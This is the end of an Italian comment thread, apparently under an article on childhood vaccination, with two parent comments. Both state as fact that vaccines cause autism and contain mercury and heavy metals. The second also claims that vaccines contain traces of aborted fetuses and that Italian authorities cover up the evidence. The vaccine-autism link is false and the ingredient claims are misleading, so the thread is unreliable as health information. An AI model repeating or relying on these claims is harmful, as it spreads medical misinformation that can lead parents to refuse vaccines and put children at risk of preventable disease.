    E mio figlio facendo indagini non aveva nessuna predisposizione genetica. I vaccini contengono mercurio ed altri metalli pesanti. Informatevi come si deve prima di aprire la bocca e dire che è per il bene dei vostri figli. Ci sono state cause in Italia vinte da genitori di bambini autistici. Negano qualsiasi correlazione tra vaccino e autismo altrimenti dovrebbero risarcire i danni a troppe famiglie.

  15. MariaRosaria Barretta 3 marzo, 2018 at 00:16 Rispondi

    Essere vaccinati non vuol dire non contrarre la malattia ….i bambini vaccinati possono contrarre le malattie anche se in forma più attenuata,meno violenta….E poi la copertura vaccinale non è per la vita…altrimenti non avrebbe senso fare i cosiddetti richiami…io credo che il problema non sia il vaccino si o no…credo che sia la sicurezza dei vaccini che cm tutti i farmaci possono avere conseguenze su bambini che hanno determinate predisposizioni….in America sta venendo fuori che c è correlazione tra autismo(E non solo) e vaccini…ma in Italia non si parla …si insabbia tutto…quello che mi fa rabbia è che ci si attacca le une cn le altre…io credo che nessuno possa giudicare le decisioni di altre mamme perché nessuno sa le esperienze e il vissuto sia delle mamme con bimbi immunodepressi sia di bimbi danneggiati…vanno rispettate tutte le posizioni…credo piuttosto che bisognerebbe unirsi per richiedere vaccini sicuri,che non contengano mercurio,tracce di feti abortiti,e altre schifezze….Questo vorrebbe dire attivarsi per il bene dei nostri figli …E non farsi la guerra come invece leggo qui…scusate se mi sono dilungata…ma questo è ciò che penso….ci vuole il rispetto per gli altri anche di quelli che la pensano diversamente….

Lascia un commento